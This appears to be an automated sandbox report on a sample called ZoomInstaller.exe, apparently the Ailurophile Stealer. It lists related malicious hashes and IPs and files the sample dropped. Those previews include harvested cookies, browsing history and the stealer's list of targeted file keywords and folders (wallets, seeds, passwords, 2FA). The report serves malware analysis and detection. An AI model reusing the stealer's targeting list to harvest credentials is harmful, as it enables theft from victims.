                                                                                  kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                                                                  • 172.67.75.163
                                                                                  Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                  • 172.67.75.163
                                                                                  eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                  • 104.26.9.59
                                                                                  iBO7gzlZr3.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.26.9.59
                                                                                  7CTH165fQv.exeGet hashmaliciousLatrodectusBrowse
                                                                                  • 104.26.8.59
                                                                                  3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                                                                                  • 172.67.75.163
                                                                                  284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                  • 104.26.8.59
                                                                                  5zFCjSBLvw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                  • 104.26.9.59
                                                                                  api.telegram.orgDocumentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 149.154.167.220
                                                                                  Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  TELEGRAMRUDocumentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 149.154.167.220
                                                                                  Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  CLOUDFLARENETUSDocumentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6Get hashmaliciousMamba2FABrowse
                                                                                  • 104.17.25.14
                                                                                  rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                  • 188.114.97.3
                                                                                  https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.comGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.17.25.14
                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 172.64.41.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Avis de virement.10.28.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 172.66.0.235
                                                                                  https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para);Get hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14
                                                                                  CLOUDFLARENETUSDocumentos.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  PAGO FRAS PENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  https://assets-usa.mkt.dynamics.com/a915fd66-2592-ef11-8a66-00224803a417/digitalassets/standaloneforms/3d7495e3-e695-ef11-8a69-000d3a3501d6Get hashmaliciousMamba2FABrowse
                                                                                  • 104.17.25.14
                                                                                  rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                  • 188.114.97.3
                                                                                  https://s6wgj.mjt.lu/lnk/BAAABjF2nGkAAAAAAAAAA8eBypUAAYKI49IAAAAAACyAswBnIDqHdUCxYEn6Q4ixPg97jrhvJQApDwU/1/UZoB7CDPf4C_dQRYOGMdHQ/aHR0cDovL3d3dy5jb25uZWN0aW5nb25saW5lLmNvbS5hci9TaXRlL0NsaWNrLmFzcHg_dD1jJmU9MjM0Mzgmc209MCZjPTM0NTQ4NDYmY3M9NWQ0ZDRpM2kmdXJsPWh0dHBzOi8vYnJpZGdybWFya2V0ZW4uc2EuY29tLzdtdUIv#Zsales@mackietransportation.comGet hashmaliciousHTMLPhisherBrowse
                                                                                  • 104.17.25.14
                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 172.64.41.3
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Avis de virement.10.28.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 172.66.0.235
                                                                                  https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para);Get hashmaliciousUnknownBrowse
                                                                                  • 104.17.25.14

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Ailurophile.zip

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                  Category:dropped
                                                                                  Size (bytes):6100
                                                                                  Entropy (8bit):7.122810248109388
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:R166v/VJELcr2oaVGr5B62ja5+1JuV+1+HlhZXS90bQfZnUOLq/0lM8HuF:TINXgrK+Li9fbQfZnUyq/Z8u
                                                                                  MD5:2B86C9493B01CF6F1AEF9A6BCBB157D8
                                                                                  SHA1:2FC7DAE2E5491A42E800923AD8D93A08B96AD6D5
                                                                                  SHA-256:056C8AB47B7BFA70D424BBD190FC682A0D43240A901300F5E094D5B14ED5D496
                                                                                  SHA-512:2924B8F7CE1E6C40E0DEB25211EC9A1A30E99F50C2B2D380EFCAD4D037366DF33B53E38890651C5AB685E153C5D78C05926C9F02512B66E3AEF58572A60945F1
                                                                                  Malicious:false
                                                                                  Preview:PK............................Ailurophile/PK............................Ailurophile\Autofills/PK........................#...Ailurophile\Autofills\Autofills.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP.....XZ.....S..._....._............X.S.......PK..G...S...V...PK............................Ailurophile\Cards/PK............................Ailurophile\Cards\Cards.txtr..)-./...IU..IM.I-R.U.I.IM/J.Rp@RP......X.R..._........PK...@.`;...>...PK............................Ailurophile\Cookies/PK........................&...Ailurophile\Cookies\Google_Default.txt.I..J..>..V..8..LH>.....`&..#..f.........wU..hvH.'##.x....M{.J...IX....eGJ..a.._..O.S....6MZ.....;o..>..h..A..x."n.5....[.}w.+...G.-....G.[.a......N'1..3.g....DP...OY.b~..n.M.....i.+...Q;.6.s.cu.I..Y......[.j'6.9rg...].>...v..3..............x{.nm...{..}34...+..C.%....]..W.o..B.........'e8fM.^]..Y..}L...d#...G..?...T.]...._l..vKj."7uM..}..1y..e.7...).u.Y...G@[........@mP$.q...E{.z..a.t..k..A..T...$..um.y~U(..y].vqG.

                                                                                  C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):86
                                                                                  Entropy (8bit):4.332226354824286
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3rbEKcJW5KeBF3R3AV:ziJi4wEJObEKcY5JFh3AV
                                                                                  MD5:6617FAF8F3D5A4BAB9ED7E6D6D81E9AC
                                                                                  SHA1:47C5D229C3D06A26D685B7C3357C9AA1951ED676
                                                                                  SHA-256:3D87146BA69810E07CAD4BD64C1731D41A2359E5D97E47115CA467784FCFC7EB
                                                                                  SHA-512:452F926F36BE843D2B76CDD7079B058986620419BB093B563AB17435B95B05D865B6903124723B2C9A60A04114EDE43CA6DEB2694AB7CCBCE4BF831B590855FE
                                                                                  Malicious:true
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No autofills found for Google Default.

                                                                                  C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):62
                                                                                  Entropy (8bit):4.411474689552285
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3rZrln:ziJi4wEJOZZn
                                                                                  MD5:7166946D592DA0325381A8F84248F7C7
                                                                                  SHA1:5DEF442E33A3A6A1890C12055A000D5014E86CB8
                                                                                  SHA-256:905E8F268FF0D5C67976E0AB04DCB91BB61A9495FB6E9E840B1CA7A962FA0D72
                                                                                  SHA-512:FE482A1AE8F524823D522B95CE1393061328C4DD202A657D5CCFBD79FD326D7B3D504B7505D4C6F042089063CBA3E4F65468B579B93CBEC562BCB7EC402A0D08
                                                                                  Malicious:true
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No cards found

                                                                                  C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text, with very long lines (515)
                                                                                  Category:dropped
                                                                                  Size (bytes):3206
                                                                                  Entropy (8bit):5.895986559721474
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:5xJoGpO2FpcRDpZAhho6Vjv3sBC/Nf8CSs+ZwX9chsW:5LoqMRjGuHt
                                                                                  MD5:36B5263419559D1B7622ED7176C0F3D7
                                                                                  SHA1:7EC3A9BF8A391741E277DC3FDD6D382A320A83C9
                                                                                  SHA-256:147623264DC09FE33055A2846BD1275CE2D09F31188715795D18006DD1747215
                                                                                  SHA-512:43FDD3B2BE9C2A108C786731E28669EEBB649E968BA5BA15C7BD55AFC0442F294DF79A3EC5285DE8B12D8253F58683DB65D3B676ECB3403D5B327AFBD568E1D6
                                                                                  Malicious:true
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn...google.com.TRUE./.FALSE.2597573456.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./.FALSE.2597573456..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.FALSE.2597573456.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.2597573456.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749

                                                                                  C:\Users\user\AppData\Local\Ailurophile\History\Google-Default.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):2226
                                                                                  Entropy (8bit):5.24684544934056
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:5JYmmNde26wtmNde2tVcDKJ3mNde2tVuDKJ3mEde2YtY42KppfY42tVVpbdY42tq:5JYmmNJ6wtmNJtaDK3mNJtEDK3mEJYtU
                                                                                  MD5:12B2217E44EF5083B62C8D70992D3111
                                                                                  SHA1:D5FEBE906162C78F9295BC925697DC9B5EBA30B0
                                                                                  SHA-256:74E0B9DF379BFB170345AC83034E8C86183621510DCF25C66EC1C3DDFF3BFCCF
                                                                                  SHA-512:4C38AF5D9D3B091F8FCBE904E5CA594777E9DABD3AB86578587518427BE1A57F0A3DD991AC6E04EC9F41198B814152588D0802E20825DF62CD533C737C467B56
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..[================.URL: https://go.microsoft.com/fwlink/?linkid=851546.Title: Examples of Office product keys - Microsoft Support.Visit Count: 2.Last Visit Time: 2023-10-03 08:07:51.Application: Google Default. ================.URL: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.Title: Examples of Office product keys - Microsoft Support.Visit Count: 2.Last Visit Time: 2023-10-03 08:07:51.Application: Google Default. ================.URL: https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us.Title: Examples of Office product keys - Microsoft Support.Visit Count: 2.Last Visit Time: 2023-10-03 08:07:51.Application: Google Default. ================.URL: https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us.Title: Examples of Of

                                                                                  C:\Users\user\AppData\Local\Ailurophile\History\Microsoft-Default.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):66
                                                                                  Entropy (8bit):4.485787733894543
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3+iJyn:ziJi4wEJv
                                                                                  MD5:34603047D92D7328CEFA79DE178D1971
                                                                                  SHA1:BE2435B5DAB5DD358E03F6C7FEE3C384826343CF
                                                                                  SHA-256:F353C24B1CD9A4E0BF4EC5572387A68D85196E27B33F9E5F713DC8DCE23C19A0
                                                                                  SHA-512:051DA884D5957CC781BCFDD665521CA32EC152068AC4684CDD1ABCC01F1FAC26ACBADF1CAADC4F0067DE2134FCD30120F0F4F4E1037996CE29783507CEA1AF71
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..[No history found]

                                                                                  C:\Users\user\AppData\Local\Ailurophile\Passwords\Google-Default.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):65
                                                                                  Entropy (8bit):4.422163682746226
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3rKNKXB5J:ziJi4wEJO8KXvJ
                                                                                  MD5:4136A47D671A2B0555965D0175796441
                                                                                  SHA1:7B25202479B7B0A124D026B75AE812359ACADBA8
                                                                                  SHA-256:EB4F0DD5FDF480AA319E286ED9559193457EF36C1255B6F2B2E7A301E4AF4B9D
                                                                                  SHA-512:E9D944AF278D6E9CFDF51C176FC53E3B9DB535568CD0A98E13EFCAF378E603195D5E54B295B0FBFF70546F92504BEBBF5B00818DEA71AEC84722D115FB026512
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No password found

                                                                                  C:\Users\user\AppData\Local\Ailurophile\Passwords\Microsoft-Default.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):65
                                                                                  Entropy (8bit):4.422163682746226
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:FJQ/Ji40JSQMJs3rKNKXB5J:ziJi4wEJO8KXvJ
                                                                                  MD5:4136A47D671A2B0555965D0175796441
                                                                                  SHA1:7B25202479B7B0A124D026B75AE812359ACADBA8
                                                                                  SHA-256:EB4F0DD5FDF480AA319E286ED9559193457EF36C1255B6F2B2E7A301E4AF4B9D
                                                                                  SHA-512:E9D944AF278D6E9CFDF51C176FC53E3B9DB535568CD0A98E13EFCAF378E603195D5E54B295B0FBFF70546F92504BEBBF5B00818DEA71AEC84722D115FB026512
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - Telegram: @Ailurophilevn..No password found

                                                                                  C:\Users\user\AppData\Local\Ailurophile\info.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (425)
                                                                                  Category:dropped
                                                                                  Size (bytes):985
                                                                                  Entropy (8bit):5.00660932715055
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:m19iRRpNYH+xalS+5on+fWu8DkiKTxp/AphGFWVZluLCIHeu6YBkL1S:zBK+QSdniiDL0ynVZl4HeMBIc
                                                                                  MD5:8383D037D31FD3CDE6BCA05191A8B84B
                                                                                  SHA1:E6144AC88FF0148A563886D77BBEBEE6BD4D62FD
                                                                                  SHA-256:D52DAE118152B18E258D89DDE0C1E20909F65D616323162903A6E45ED3A8871A
                                                                                  SHA-512:A09698EA2285F5C92CE2A248986166F0F23E21EAE13C7AFAF5A9AAF1F564D018ED9A53514C2EFC29372DD5C3520537CA04983DDB938CEA92517BC71A1015712F
                                                                                  Malicious:false
                                                                                  Preview:Ailurophile Stealer - https://ailurophilestealer.com - Telegram: @Ailurophilevn..IP: 173.254.250.72.Country: United States.Hostname: 216554.PC Type: Microsoft Windows 10 Pro 10.0.19045.Architecture: amd64.File Path: C:\Users\user\Desktop.Main Path: C:\Users\user\AppData\Local\Ailurophile.Allowed Extensions: [rdp txt doc docx pdf csv xls xlsx keys ldb log].Folders to Search: [Documents Desktop Downloads].Files: [secret password account tax key wallet gang default backup passw mdp motdepasse acc mot_de_passe login secret bot atomic account acount paypal banque bot metamask wallet crypto exodus discord 2fa code memo compte token backup secret seed mnemonic memoric private key passphrase pass phrase steal bank info casino prv priv. prive telegram identifiant identifiants personnel trading bitcoin sauvegarde funds recup note].MAC Address: ec:f4:bb:ea:15:88.Screen Resolution: 1280x1024.Browsers:.Chrome Default - version: 117.0.5938.132.Edge Default - version: 117.0.2045.47.

                                                                                  C:\Users\user\AppData\Local\Ailurophile\stolen_files.zip

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                  Category:dropped
                                                                                  Size (bytes):3822
                                                                                  Entropy (8bit):7.490205532827105
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:TmL0dGf7QmL0dGf7QmL0dGf7QmL0dGf7QmL0dGf7Ok:i48n48n48n48n48Kk
                                                                                  MD5:0D0E3012B9AE166C6F561C6B1FBE6566
                                                                                  SHA1:F8997167083262B609EDC56D1BD0EF68DC35FB30
                                                                                  SHA-256:44FDBCBB3D33289C5A2F91D450521409799094A6DF22A9175028E4EC2F69C8AC
                                                                                  SHA-512:DB42ED1994E72B8D6D243B33B0873D715A418146F53C9582889CC571120275012F314A5C40D1B2D2F7AB77E58741698F0ADBF5C7C2AE9A88B43D7DE314FBDC67
                                                                                  Malicious:false
                                                                                  Preview:PK............................KATAXZVCPS.pdf...m.!....&.J.Q.D.s.A.N.%...x..:.J`0.-}zs..{+X(...v..UD.......a.../.y....K.=..e....."..j.b-....6.3.9...ui.cJ..Q^.U.......+$.X.h.,....7....Wp..E~..>..z.......+-.P.'...1.<E..<Q.k.C...C....D...~..v.._.H..Th\J.......cF..|..9mX....=w.d.#..o...(...y..4=...^..j...r......S.WG..'..B..>..)....$8..'..}......Z..JU....n...m[..yt..\.m.:.!....H.!...|....mo.p.v......qS.....,X.p:..w.!.s7....6v'.%4l....*.C*D.L.NK.....::.d......"D..O.sGb_4..h.~...>....HoW.).j{..H..t)....m#^.].kQ1...Q..i<..|.<8dK....@........9...t?..0..w.pt..n.%c..H0.u....@.f}....$.'[l..0......M.]j....hY...)4..yk.7.E^..r....=&....#.........PK...1n.........PK............................KATAXZVCPS.pdf...m.!....&.J.Q.D.s.A.N.%...x..:.J`0.-}zs..{+X(...v..UD.......a.../.y....K.=..e....."..j.b-....6.3.9...ui.cJ..Q^.U.......+$.X.h.,....7....Wp..E~..>..z.......+-.P.'...1.<E..<Q.k.C...C....D...~..v.._.H..Th\J.......cF..|..9mX....=w.d.#

                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.1358696453229276
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):159744
                                                                                  Entropy (8bit):0.7873599747470391
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.1358696453229276
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
